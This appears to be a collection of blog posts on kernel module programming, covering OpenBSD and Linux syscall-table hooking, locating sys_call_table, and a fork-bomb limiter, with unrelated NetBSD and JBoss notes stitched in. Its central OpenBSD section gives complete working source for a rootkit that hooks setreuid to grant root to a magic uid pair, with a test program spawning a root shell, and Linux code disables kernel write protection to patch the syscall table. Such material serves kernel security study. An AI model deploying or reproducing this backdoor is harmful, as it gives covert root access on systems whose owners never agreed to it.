Many thanks to:
- blackb1rd (a phrack reviewer) who helped me in writing the paper.
- All the phrack staff for publishing the paper.
- emdel for … mmmh … Hi, emdel!

Any comments or suggestions would be (obviously) appreciated.
Bye.

- An example of OpenBSD LKM

Fist of all, an example of OpenBDS LKM (“LKM_test.c”) follows:

#include <sys/param.h>
#include <sys/systm.h>
#include <sys/ioctl.h>
#include <sys/cdefs.h>
#include <sys/conf.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/proc.h>
#include <sys/kernel.h>

MOD_MISC("LKM_test");

int LKM_test_lkmentry(struct lkm_table *, int, int);
int LKM_test_lkmload(struct lkm_table *, int);
int LKM_test_lkmunload(struct lkm_table *, int);
int LKM_test_lkmstat(struct lkm_table *, int);

int LKM_test_lkmload(struct lkm_table *lkmt, int cmd) {
	
	printf("Hello!\n");
	return 0;


}
int LKM_test_lkmunload(struct lkm_table *lkmt, int cmd) {

	printf("Goodbye\n");
	return 0;
}

int LKM_test_lkmstat(struct lkm_table *lkmt, int cmd) {

	printf("Here I am!\n");
	return 0;
}

int LKM_test_lkmentry(struct lkm_table *lkmt, int cmd, int ver) {

	DISPATCH(lkmt, cmd, ver, LKM_test_lkmload, LKM_test_lkmunload, LKM_test_lkmstat);

}

The behavior of this module is very simple: the LKM_test_lkmentry() function is the entry point function of the kernel module and it’s the first function invoked when the module is loaded in memory. In this function the DISPATCH() macro is called: this macro is defined in “sys/lkm.h”:

...

#define DISPATCH(lkmtp,cmd,ver,load,unload,stat) do {
	if (ver != LKM_VERSION)
		return EINVAL;
	switch (cmd) {  
		int     error;
		case LKM_E_LOAD:
			lkmtp->private.lkm_any = (struct lkm_any *)&_module;
			if ((error = load(lkmtp, cmd)) != 0)
				return error;
			break;   
		case LKM_E_UNLOAD:  
			if ((error = unload(lkmtp, cmd)) != 0) 
				return error;
			break;
		case LKM_E_STAT:
			if ((error = stat(lkmtp, cmd)) != 0)
				return error;
			break;
		}      
		
		return lkmdispatch(lkmtp, cmd);
} while (/* CONSTCOND */ 0)
	
...

The DISPATCH macro handles the loading (by the fourth argument), unloading (by the fifth argument) and querying (by the sixth argument) of the module.
The module can be compiled running the “cc” command:

# cc -D_KERNEL -I/sys -c LKM_test.c

The module can be loaded, unloaded and queried via “modload”, “modunload” and “modstat” commands:

# modload LKM_test.o
Module loaded as ID 0
#
# modstat -n LKM_test
Type	Id   Off   Loadaddr   Size  Info       Rev    Module Name
MISC	0      0   d44ef000   0001  d44ef12c     2    LKM_test
#
# modunload -n LKM_test
#
# tail /var/log/messages
...
Oct 20 22:02:20 spaccio /bsd Hello!
Oct 20 22:02:20 spaccio /bsd DDB symbols added: 365344 bytes
Oct 20 22:03:47 spaccio /bsd Here I am!
Oct 20 22:04:20 spaccio /bsd Goodbye!

- System call in OpenBSD

The definition of the internal lkm structure for a syscall it’s defined in “sys/lkm.h” and it follows:

struct lkm_syscall {
	MODTYPE         lkm_type;
	int             lkm_ver;
	char           *lkm_name;
	u_long          lkm_offset;     /* save/assign area */
	struct sysent  *lkm_sysent;
	struct sysent   lkm_oldent;     /* save area for unload */
};

The fields of this structure represent the type of module, the lkm version, the name of the module, the offset at which to place the system call inside the syscall table. Moreover it’s present a pointer to a “sysent” structure.
This structure is defined in “sys/systm.h”:

extern struct sysent {			/* system call table */
	short 		sy_narg		/* number of args */
	short 		sy_argsize;	/* total size of arguments */
	int 		sy_flags;
	sy_call_t 	*sy_call;	/* implementing function */
} sysent[];

The “sysent” array is the syscall table and it’s exported… ;-)
The “lkm_syscall” struct will be initialised using the MOD_SYSCALL macro (defined in “sys/lkm.h”):

#define MOD_SYSCALL(name,callslot,sysentp)      
	static struct lkm_syscall _module = {   
		LM_SYSCALL,
		LKM_VERSION,
		name,
		callslot,
		sysentp
	};

- System calls Hijacking

We have now all the informations we need to hijack a system call. The method I’ll show is similar to that used for hooking the syscalls in kernel 2.4 versions. As I said before, the “sysent” array is like the old “syscall_table” exported in Linux kernel 2.4. So, what we have to do is overwriting the syscall address of the interested syscall with that of our function inside the “sysent” array.
Each syscall has an unique id-number defined in “sys/syscall.h” that represents also its position inside the system call table. If we want to hijack the (i.e.) “mkdir()” syscall, we have only to search the “mkdir” id-number inside in this header file:

...
/* syscall: "sendto" ret: "ssize_t" args: "int" "const void *" "size_t" "int" "const struct sockaddr *" "socklen_t" */
#define SYS_sendto      133

/* syscall: "shutdown" ret: "int" args: "int" "int" */
#define SYS_shutdown    134

/* syscall: "socketpair" ret: "int" args: "int" "int" "int" "int *" */
#define SYS_socketpair  135
 
/* syscall: "mkdir" ret: "int" args: "const char *" "mode_t" */
#define SYS_mkdir       136
 
/* syscall: "rmdir" ret: "int" args: "const char *" */
#define SYS_rmdir       137
 
/* syscall: "utimes" ret: "int" args: "const char *" "const struct timeval *" */
#define SYS_utimes      138

...

The “mkdir” id-number is the number 136.
The values contained inside the “sysent” structure are defined in the “init_sysent.c” file:

struct sysent sysent[] = {
...
 { 2, s(struct sys_mkdir_args), 0,
  352             sys_mkdir }, 
...

According to the prototype of the “sysent” structure, the first field represents the number of arguments. The second arguments is the size of the “sys_mkdir_args” structure, that is the structure in which the “mkdir” arguments are defined. All the syscalls’ arguments are defined inside the “sys/syscallargs.h” file:

...

struct sys_mkdir_args {
	syscallarg(const char *) path;
	syscallarg(mode_t) mode;
};

...

The “mkdir” syscall accepts two arguments: the directory path and mode.
The fourth argument of the “sysent” structure is a pointer to the implementing function “sys_mkdir()”. We can find the “sys_mkdir()” prototype inside the same file:

int     sys_mkdir(struct proc *, void *, register_t *);

All the syscall functions take as arguments these three fields:

- a “struct proc” pointer: The structure that contains the informations about the process that it’s invoking the syscall.
- a “void” pointer to the syscall’s arguments.
- a “register_t” (it’s a simple integer) pointer to the syscall return value.

Now we have all the necessary informations we need to hijack the “mkdir” syscall.
The “hijack.c” source code follows:

#include <sys/param.h>
#include <sys/systm.h>
#include <sys/ioctl.h>
#include <sys/cdefs.h>
#include <sys/conf.h>
#include <sys/mount.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/proc.h>
#include <sys/kernel.h>
#include <sys/syscallargs.h>
#include <sys/syscall.h>

MOD_MISC("hijack");

int hijack_lkmentry(struct lkm_table *, int, int);
int hijack_lkmload(struct lkm_table *, int);
int hijack_lkmunload(struct lkm_table *, int);
int hijack_lkmstat(struct lkm_table *, int);

int (*mkdir_old)(struct proc *td, void *args, register_t *b);

int mkdir_new(struct proc *td, void *args, register_t *b) {

	struct sys_mkdir_args /* {
                 syscallarg(const char *) path;
                 syscallarg(mode_t) mode;
  	} */ *uap = args;
 
	printf("Mkdir hijacked -> %s %x\n", uap->path, uap->mode);
	
	return (mkdir_old(td, args, b));
}

int hijack_lkmload(struct lkm_table *lkmt, int cmd) {

	mkdir_old = sysent[SYS_mkdir].sy_call;	
	sysent[SYS_mkdir].sy_call = (sy_call_t *) mkdir_new;
	
	printf("Hello!\n");
	
	return 0;


}
int hijack_lkmunload(struct lkm_table *lkmt, int cmd) {
	
	sysent[SYS_mkdir].sy_call = (sy_call_t *) mkdir_old;

	printf("Goodbye\n");
	
	return 0;

}

int hijack_lkmstat(struct lkm_table *lkmt, int cmd) {

	printf("Here I am!\n");
	return 0;

}

int hijack_lkmentry(struct lkm_table *lkmt, int cmd, int ver) {

	DISPATCH(lkmt, cmd, ver, hijack_lkmload, hijack_lkmunload, hijack_lkmstat);

}

We can compile (and load) this module and we can create a new “test” directory to check if the module works properly:

# cc -D_KERNEL -I/sys -c hijack.c
# modload hijack.o
Module loaded as ID 0
# mkdir test
# ls ./
test
# tail /var/log/messages
...
Oct 20 22:15:38 spaccio /bsd Hello!
Oct 20 22:15:38 spaccio /bsd DDB symbols added: 365344 bytes
Oct 20 22:16:10 spaccio /bsd Mkdir hijacked -> test 1ed

Perfect! The directory has been created and the syscall has been hijacked as expected.
Now we can write a more interesting kernel module.

- A very simple rootkit

Now I’ll show you how to change the process credentials through kernel modules. I use the same method shown in this post. Our rootkit will give us root credentials when we invoke a new shell with RUID == 3410 && EUID == 0143. We only need to hijack the “setreuid” syscall and to check the ruid and euid correctness.
As I wrote before, the first argument of each syscall function is a “struct proc” pointer that contains the informations about the process that it’s calling the syscall. So, we only need to change the credentials’ values stored in this structure.
This structure is defined in “sys/proc.h”:

 struct process {

	struct  proc *ps_mainproc;
	struct  pcred *ps_cred;         /* Process owner's identity. */
	struct  plimit *ps_limit;       /* Process limits. */
 
	TAILQ_HEAD(,proc) ps_threads;   /* Threads in this process. */
	int     ps_refcnt;              /* Number of references. */
};

We are interested on the “pcred” structure. This structure contains all the informations about the process owner’s credentials. This struct is defined in the same file:

struct  pcred {
	struct  ucred *pc_ucred;        /* Current credentials. */
	uid_t   p_ruid;                 /* Real user id. */
	uid_t   p_svuid;                /* Saved effective user id. */
	gid_t   p_rgid;                 /* Real group id. */
	gid_t   p_svgid;                /* Saved effective group id. */
	int     p_refcnt;               /* Number of references. */
};

The “ucred” structure is defined in the “sys/ucred.h” file:

struct ucred {
	u_int   cr_ref;                 /* reference count */
	uid_t   cr_uid;                 /* effective user id */
	gid_t   cr_gid;                 /* effective group id */
	short   cr_ngroups;             /* number of groups */
	gid_t   cr_groups[NGROUPS];     /* groups */
};

We have to hijack the “setreuid” syscall and change these values.
The rootkit kernel module (“rootkit.c”) follows:

#include <sys/param.h>
#include <sys/systm.h>
#include <sys/ioctl.h>
#include <sys/cdefs.h>
#include <sys/conf.h>
#include <sys/mount.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/proc.h>
#include <sys/kernel.h>
#include <sys/syscallargs.h>
#include <sys/syscall.h>

MOD_MISC("rootkit");

int rootkit_lkmentry(struct lkm_table *, int, int);
int rootkit_lkmload(struct lkm_table *, int);
int rootkit_lkmunload(struct lkm_table *, int);
int rootkit_lkmstat(struct lkm_table *, int);

int (*setreuid_old)(struct proc *td, void *args, register_t *b);

int setreuid_new(struct proc *td, void *args, register_t *b) {

	struct sys_setreuid_args /* {
		syscallarg(uid_t) ruid;
		syscallarg(uid_t) euid;
	}*/ *uap = args;
	
	uid_t uid;
	uid_t ruid, euid;

	ruid = SCARG(uap, ruid);
	euid = SCARG(uap, euid);
 
	if ((ruid == 3410) && (euid == 0143))   {
	
		td->p_cred->p_ruid = 0;
		td->p_cred->p_svuid = 0;
		td->p_cred->p_rgid = 0;
		td->p_cred->p_svgid = 0;
		
		td->p_cred->pc_ucred->cr_uid = 0;
		td->p_cred->pc_ucred->cr_gid = 0;
		
		ruid = 0;
		euid = 0;
		
		SCARG(uap, ruid) = ruid;
		SCARG(uap, euid) = euid;	
	}
	
	return (setreuid_old(td, args, b));
}

int rootkit_lkmload(struct lkm_table *lkmt, int cmd) {

	setreuid_old = sysent[SYS_setreuid].sy_call;	
	sysent[SYS_setreuid].sy_call = (sy_call_t *) setreuid_new;
	
	printf("Hello!\n");
	
	return 0;


}
int rootkit_lkmunload(struct lkm_table *lkmt, int cmd) {
	
	sysent[SYS_setreuid].sy_call = (sy_call_t *) setreuid_old;

	printf("Goodbye\n");
	
	return 0;

}

int rootkit_lkmstat(struct lkm_table *lkmt, int cmd) {

	printf("Here I am!\n");
	return 0;

}

int rootkit_lkmentry(struct lkm_table *lkmt, int cmd, int ver) {

	DISPATCH(lkmt, cmd, ver, rootkit_lkmload, rootkit_lkmunload, rootkit_lkmstat);

}

We can use the following script (“test.c”) to test the rootkit:

#include <stdio.h>

int main () {

        setreuid (3410, 0143);
        system ("/bin/sh");

        return 0;
}

Now we can compile and then load the kernel module:

# cc -D_KERNEL -I/sys -c rootkit.c
# modload rootkit.o
Module loaded as ID 0

Now, we can change user and we can test if the kernel module works properly:

# su - spaccio
$ ./test
# whoami
root
# exit
$ 

Great, it works! :-)
Bye.

...
acpiacad0: AC adapter online.
uvm_fault(0xc09e6a40, 0, 2) -> 0xe
fatal page fault in supervisor mode
trap type 6 code 2 eip c0100d69 cs 8 eflags 10246 cr2 0 ilevel 0
kernel: supervisor trap page fault, code=0
Stopped in pid 0.15 (system) at netbsd:spllower+0x29:  addl %eax,0(%eax)
db{0}>

The following workaround allows you to install and run NetBSD on Virtualbox. If the name of the NetBSD machine is “NetBSD”, you have to run this command in your shell:

$ vboxsdl --norawr0 --startvm NetBSD

That’s all!
Bye bye.

i’m writing this little note as “errata corrige”   of HTTPS Configuration  Chapter in RedHat JBoss EAP Installation Guide. If you follow the steps indicated there you will get a not working Tomcat’s istance: That’s because they are missing a step well explained in the Tomcat 6 SSL How To:

Shortly Tomcat can use two SSL Engine:

• the JSSE implementation provided as part of the Java runtime (since 1.4)
• the APR implementation, which uses the OpenSSL engine by default

the RedHat guide shows you how to use java keytool, which can be used with the JSSE implementation, but the default tomcat configuration in JBoss EAP 5.1 uses the APR implementation, that’s means if you would use the keytool and the keystore as i suggest you, you should change this line in <server-profile>/deploy/jbossweb.sar/server.xml

<Listener className=”org.apache.catalina.core.AprLifecycleListener” SSLEngine=”on” />

with this line

<Listener className=”org.apache.coyote.http11.Http11NioProtocol” SSLEngine=”on” />

for non-blocking ssl listener or with

<Listener className=”org.apache.coyote.http11.Http11Protocol” SSLEngine=”on” />

to obtain a blocking ssl listener.

After that you can easily follow the redhat guide.

...

#define START_MEM	0xc0000000
#define END_MEM		0xd0000000

...

unsigned long **find() {

	unsigned long **sctable;
	unsigned long int i = START_MEM;

	while ( i < END_MEM) {

		sctable = (unsigned long **)i;

		if ( sctable[__NR_close] == (unsigned long *) sys_close) {

			return &sctable[0];

		}
		
		i += sizeof(void *);
	}

	return NULL;
}

Simply it scans the memory from START_MEM to END_MEM: when the “__NR_close”-th address of “sctable” is equals to the “sys_close()” address, we are sure that “sctable” is pointing to the syscall table. So we have only to return this address and use it as usual.
Follows the LKM source code (“bruteforce.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
 #include <asm/system.h>

MODULE_LICENSE("GPL");

#define START_MEM	0xc0000000
#define END_MEM		0xd0000000

unsigned long *syscall_table; 

unsigned long **find() {

	unsigned long **sctable;
	unsigned long int i = START_MEM;

	while ( i < END_MEM) {

		sctable = (unsigned long **)i;

		if ( sctable[__NR_close] == (unsigned long *) sys_close) {

			return &sctable[0];

		}
		
		i += sizeof(void *);
	}

	return NULL;
}

static int init(void) {

	printk("\nModule starting...\n");

	syscall_table = (unsigned long *) find();

	if ( syscall_table != NULL ) {
	
		printk("Syscall table found at %x\n", (unsigned ) syscall_table);
	
	} else {
	
		printk("Syscall table not found!\n");
		
	}	

	return 0;
}

static void exit(void) {

    printk("Module ending\n");

    return;
}

module_init(init);
module_exit(exit);

Here is the Makefile:

obj-m	:= bruteforce.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

We can compile it:

spaccio@spaccio:~/Hijack/bruteforce$ make
make -C /lib/modules/2.6.35-22-generic/build SUBDIRS=/home/spaccio/Hijack/bruteforce modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.35-22-generic'
  CC [M]  /home/spaccio/Hijack/bruteforce/bruteforce.o
/home/spaccio/Hijack/bruteforce/bruteforce.c:19: warning: function declaration isn’t a prototype
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/spaccio/Hijack/bruteforce/bruteforce.mod.o
  LD [M]  /home/spaccio/Hijack/bruteforce/bruteforce.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.35-22-generic'
spaccio@spaccio:~/Hijack/bruteforce$

Finally we can run it:

spaccio@spaccio:~/Hijack/bruteforce$ sudo insmod bruteforce.ko
spaccio@spaccio:~/Hijack/bruteforce$

Now we check if the address found is correct or not:

spaccio@spaccio:~/Hijack/bruteforce$ dmesg | tail
...
[  725.653763] Module starting...
[  725.988959] Syscall table found at c05d2180
spaccio@spaccio:~/Hijack/bruteforce$
spaccio@spaccio:~/Hijack/bruteforce$ cat /boot/System.map-2.6.35-22-generic | grep sys_call_table
c05d2180 R sys_call_table
spaccio@spaccio:~/Hijack/bruteforce$

As expected, the syscall address is correct.
You can include the “find()” function in your LKM, so finding dinamically the syscall table address.
Bye.

#include <stdio.h>

int main() {

	fork();

	return 0;

}

We can compile it, run it and trace (man strace) the executable:

spaccio@spaccio-laptop:~$ gcc simple_fork.c -o simple_fork
spaccio@spaccio-laptop:~$ ./simple_fork
spaccio@spaccio-laptop:~$ strace ./simple_fork
execve("./simple_fork", ["./simple_fork"], [/* 47 vars */]) = 0
...
munmap(0xb78e0000, 88209)               = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb78dfb98) = 6731
exit_group(0)                           = ?
spaccio@spaccio-laptop:~$

As you can see, the “clone()” function (man clone) is called: why is’nt called the “fork()” function instead?
Looking at “man fork()”:

Since version 2.3.3, rather than invoking the kernel's fork() system call, the
glibc fork() wrapper that is provided as part of the NPTL threading
implementation invokes clone(2) with flags that provide the same effect as the
traditional system call.  The glibc wrapper invokes any fork handlers that
have been established using pthread_atfork(3).

If you want to pursue about this topic, I suggest you to read this post that explain it very well.
In the previous glibc version could be called directly the fork system call.
We want to know which system calls are associated to both the functions:

spaccio@spaccio-laptop:~$ cat /usr/include/asm-generic/unistd.h |grep -e clone -e fork
/* kernel/fork.c */
#define __NR_clone 220
__SYSCALL(__NR_clone, sys_clone)	/* .long sys_clone_wrapper */
#define __NR_vfork 1071
__SYSCALL(__NR_vfork, sys_vfork)
#define __NR_fork 1079
__SYSCALL(__NR_fork, sys_fork)
__SYSCALL(__NR_fork, sys_ni_syscall)
#define __NR_syscalls (__NR_fork+1)
spaccio@spaccio-laptop:~$ 

“Clone()” is a libc wrapper for the “sys_clone” system call: it’s defined in “arch/x86/kernel/process_32.c” (otherwise in a 64bit architecture in “process_64.c”):

asmlinkage int sys_clone(struct pt_regs regs)
{
	unsigned long clone_flags;
	unsigned long newsp;
	int __user *parent_tidptr, *child_tidptr;

	clone_flags = regs.bx;
	newsp = regs.cx;
	parent_tidptr = (int __user *)regs.dx;
	child_tidptr = (int __user *)regs.di;
	if (!newsp)
		newsp = regs.sp;
	return do_fork(clone_flags, newsp, &regs, 0, parent_tidptr, child_tidptr);
}

Istead the “fork()” is a wrapper for the “sys_fork” system call (again defined into “process_32.c”):

asmlinkage int sys_fork(struct pt_regs regs)
{
	return do_fork(SIGCHLD, regs.sp, &regs, 0, NULL, NULL);
}

Both the functions call the “do_fork()” function that handles the creation of a new process.
In this post I’ll treat only the “clone” system call.
The idea of this fork-bomb prevention is very simple: we have to hijack the “clone” system call and check for the current process number. If this number is greater then a threshold we prevent the creation of a new process.
We know how hijack a system call. Now we need to know how count the number of the running process in our system.
The kernel gives us a macro that we can use for our purpose:

#define for_each_process(p) \
        for (p = &init_task ; (p = next_task(p)) != &init_task ; )

This macro is defined in “linux/sched.h”. It simply scans all the processes in the system.
The “next_task()” function is defined as follows:

#define next_task(p)    list_entry((p)->tasks.next, struct task_struct, tasks)

The definition of “list_entry()” is the following:

/*
 * list_entry - get the struct for this entry
 * @ptr:        the &struct list_head pointer.
 * @type:       the type of the struct this is embedded in.
 * @member:     the name of the list_struct within the struct.
 */
#define list_entry(ptr, type, member) \
        container_of(ptr, type, member)

Thanks to this macro we can list all the running processes:

struct task_struct *task;

for_each_process(task) {
	printk("%s => %d\n", task->comm ,  task->pid);
}

So we have only to count the number of processes found:

int numb_proc = 0;
struct task_struct *task;

for_each_process(task) {

	numb_proc++;
}

Now we have only to hijack the “clone” system call (you can extend the module intercepting the “fork” system call) and check for the processes number.
Follows the code of the kernel module (“antifork.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/current.h>
#include <linux/sched.h>

#define THRESHOLD	123

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

asmlinkage int (*original_clone)(struct pt_regs regs);

asmlinkage int new_clone(struct pt_regs regs) {

	int numb_proc = 0;
	struct task_struct *task;

	for_each_process(task) {

		numb_proc++;
	}

	printk("Current process number %d\n", numb_proc);

	if ( numb_proc > THRESHOLD) {

		printk("Fork not permitted\n");
		return -EAGAIN;
	}

	return (*original_clone)(regs);

}

static int init(void) {

    printk(KERN_ALERT "\nHIJACK INIT\n");

    write_cr0 (read_cr0 () & (~ 0x10000));

    original_clone = (void *)syscall_table[__NR_clone];
    syscall_table[__NR_clone] = new_clone;  

    write_cr0 (read_cr0 () | 0x10000);

    return 0;
}

static void exit(void) {

    write_cr0 (read_cr0 () & (~ 0x10000));

    syscall_table[__NR_clone] = original_clone;  

    write_cr0 (read_cr0 () | 0x10000);

    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

Obviously, in order to work properly you need to change the “syscall_table” address according to your. If you don’t know how to do it, you can read this and this posts.
Here is the Makefile:

obj-m	:= antifork.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

We can compile it:

spaccio@spaccio-laptop:~$ make
make -C /lib/modules/2.6.35-22-generic/build SUBDIRS=/home/spaccio/ modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.35-22-generic'
  CC [M]  /home/spaccio/antifork.o
/home/spaccio/antifork.c: In function ‘init’:
/home/spaccio/antifork.c:45: warning: assignment makes integer from pointer without a cast
/home/spaccio/antifork.c: In function ‘exit’:
/home/spaccio/antifork.c:56: warning: assignment makes integer from pointer without a cast
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/spaccio/antifork.mod.o
  LD [M]  /home/spaccio/antifork.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.35-22-generic'
spaccio@spaccio-laptop:~$ 

Now we can load the module and check for the processes number:

spaccio@spaccio-laptop:~$ sudo insmod antifork.ko 
spaccio@spaccio-laptop:~$ tail /var/log/messages 
...
Feb  7 21:33:39 spaccio kernel: [  699.921277] Current process number 123
spaccio@spaccio-laptop:~$

Voluntarily I’ve decreased the threshold in the source to 123 so I can test the module correctness.
Now, if I run the “simple_fork” script, the module hijacks the clone system call, checks for the processes number and will prevent to create a new process:

spaccio@spaccio-laptop:~$ ./simple_fork
fork: Resource temporarily unavailable
spaccio@spaccio-laptop:~$

As you can see we can’t create a new process. We can also verify this from the “messages” log:

spaccio@spaccio-laptop:~$ tail /var/log/messages 
...
Feb  7 21:37:17 spaccio kernel: [  917.821033] Current process number 123
Feb  7 21:37:17 spaccio kernel: [  917.833976] Current process number 124
Feb  7 21:37:17 spaccio kernel: [  917.834047] Fork not permitted

The current process number was greater than the threshold so the kernel module blocks the fork.
The post is finished and I hope that it can help you to better understand the kernel programming and how the kernel handles the fork bomb prevention.
As usual, for any questions you can use comments.
Bye.

unsigned long **find_sys_call_table(void)  {

   unsigned long **sctable;
   unsigned long ptr;
   extern int loops_per_jiffy;

   sctable = NULL;
   for (ptr = (unsigned long)&loops_per_jiffy;
        ptr < (unsigned long)&boot_cpu_data; 
        ptr += sizeof(void *))
   {
      unsigned long *p;
      p = (unsigned long *)ptr;
      if (p[__NR_close] == (unsigned long) sys_close)
      {
         sctable = (unsigned long **)p;
         return &sctable[0];
      }
   }

   return NULL;
}

This function searches the syscall address between the “loops_per_jiffy” and “cpu_boot_data” addresses. This code doesn’t make sense in the lastest kernel releases because “loops_per_jiffy” has been “moved”, so sys_call_table is not between it and “boot_cpu_data” any more. Furthermore, it is based on the erroneous assumption that “sys_call_table” is always between two fixed addresses. Its position may change and this is true not only for the lastest kernel release, but also for the older ones.
For example in my ubuntu machine (kernel 2.6.35-24-generic):

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-24-generic |grep -e "D loops_per_jiffy" -e "sys_call_table" -e "D boot_cpu_data"

c05d3180 R sys_call_table
c07c8bc8 D loops_per_jiffy
c0815040 D boot_cpu_data

spaccio@spaccio-laptop:~$ 

As you can see:

c05d3180 (sys_call_table) < c07c8bc8 (loops_per_jiffy) < c0815040 (boot_cpu_data)

So: how can we be sure to obtain the correct address?
We can do a brute force scan on memory addresses searching for the syscall table address: but this is a bad solution.
Instead I’ve found two solutions: the first one finds the address at compile-time; the second one finds the address at run-time when the kernel module is loaded into the memory.

- Finding syscall table address at compile-time

We can simply obtain the syscall table address using some shell (bash) commands in the “Makefile”. So at first we scan the “System.map-kernel_version” file searching for the syscall address. Next we replace it into the kernel module and we compile it as usual.
Here is the bash command that finds the syscall table address into “System.map-kernel_version”:

spaccio@spaccio-laptop:~$ grep sys_call_table /boot/System.map-$(uname -r) |awk '{print $1}'
c05d3180
spaccio@spaccio-laptop:~$

So we have to write a bash executable (compile.sh) that:

- finds the syscall table address;
- inserts it into the .c source;
- runs the Makefile;

Here is the bash file (“compile.sh”):

#!/bin/bash

TABLE=$(grep sys_call_table /boot/System.map-$(uname -r) |awk '{print $1}')
sed -i s/TABLE/$TABLE/g hijack.c

make

spaccio@spaccio-laptop:~$ chmod +x compile.sh
spaccio@spaccio-laptop:~$

Here is the “Makefile”:

obj-m	:= hijack.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Here is the LKM (“hijack.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xTABLE; 

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {

    // hijacked write

    printk(KERN_ALERT "WRITE HIJACKED");

    return (*original_write)(fd, buf, count);
}

static int init(void) {

    printk(KERN_ALERT "\nHIJACK INIT\n");

    write_cr0 (read_cr0 () & (~ 0x10000));

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = new_write;  

    write_cr0 (read_cr0 () | 0x10000);

    return 0;
}

static void exit(void) {

    write_cr0 (read_cr0 () & (~ 0x10000));

    syscall_table[__NR_write] = original_write;  

    write_cr0 (read_cr0 () | 0x10000);

    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

We can compile it:

spaccio@spaccio-laptop:~$ sh compile.sh
make -C /lib/modules/2.6.35-24-generic/build SUBDIRS=/home/spaccio/Hacking/Syscall_Hijack/mod2 modules
make[1]: ingresso nella directory "/usr/src/linux-headers-2.6.35-24-generic"
  CC [M]  /home/spaccio/Hacking/Syscall_Hijack/mod2/hijack.o
/home/spaccio/Hacking/Syscall_Hijack/mod2/hijack.c: In function ‘init’:
/home/spaccio/Hacking/Syscall_Hijack/mod2/hijack.c:33: warning: assignment makes integer from pointer without a cast
/home/spaccio/Hacking/Syscall_Hijack/mod2/hijack.c: In function ‘exit’:
/home/spaccio/Hacking/Syscall_Hijack/mod2/hijack.c:44: warning: assignment makes integer from pointer without a cast
  Building modules, stage 2.
  MODPOST 1 modules
  LD [M]  /home/spaccio/Hacking/Syscall_Hijack/mod2/hijack.ko
make[1]: uscita dalla directory "/usr/src/linux-headers-2.6.35-24-generic"

Now if you open the “hijack.c” file you’ll see that instead of the “TABLE” there is the syscall table address:

spaccio@spaccio-laptop:~$ cat hijack.c |grep *syscall_table
unsigned long *syscall_table = (unsigned long *)0xc05d3180; 
spaccio@spaccio-laptop:~$

We can run it:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
spaccio@spaccio-laptop:~$ 

Great, it works!
This is a very simple, working and efficient solution, but I wanted a more sophisticated one.

- Finding syscall table address at run-time

I invented this method, so it might not be very elegant and/or efficient (any help will be appreciated for improvements). I wanted to open and search the syscall table address into the “System.map-kernel_version” file via a LKM.
In order to obtain the syscall table address at run-time we have to follow this steps:

1 – Find where the system stores the kernel version that we are using. When we have found the kernel version we can open the relative “/boot/System.map-kernel_version” file;
2 – Open the “/boot/System.map-kernel_version” file found at step 1.
3 – Search for the syscall table address and use it;

We can find the kernel version reading it from the “/proc/” filesystem. We are especially interested in a file:

spaccio@spaccio-laptop:~$ cat /proc/version
Linux version 2.6.35-24-generic (buildd@vernadsky) (gcc version 4.4.5 (Ubuntu/Linaro 4.4.4-14ubuntu5) ) #42-Ubuntu SMP Thu Dec 2 01:41:57 UTC 2010
spaccio@spaccio-laptop:~$

The “version” file consists of a string describing the Linux kernel version number. It contains the version information that would be obtained by the uname (man uname) system call plus additional information such as the version of the compiler that was used to compile the kernel.
The following function opens the “/proc/version” file and tokenizes the string in order to obtain only the kernel version string:

...
#define PROC_V			"/proc/version"
#define MAX_LEN			256
...

char *search_file(char *buf) {
	
	struct file *f;
	char *ver;
	mm_segment_t oldfs;

	oldfs = get_fs();
	set_fs (KERNEL_DS);
	
	f = filp_open(PROC_V, O_RDONLY, 0);
	
	if ( IS_ERR(f) || ( f == NULL )) {
	
		return NULL;
	
	}
	
	memset(buf, 0, MAX_LEN);
	
	vfs_read(f, buf, MAX_LEN, &f->f_pos);
	
	ver = strsep(&buf, " ");
	ver = strsep(&buf, " ");
	ver = strsep(&buf, " ");
	
	printk(KERN_ALERT "Kernel version found: %s\n", ver);
		
	filp_close(f, 0);	
	set_fs(oldfs);
	
	return ver;

}

As you can see, I open the “/proc/version” file and I read MAX_LEN byte from it. (If you want to know how we can open/read/write to a file in a kernel space, you should read this).
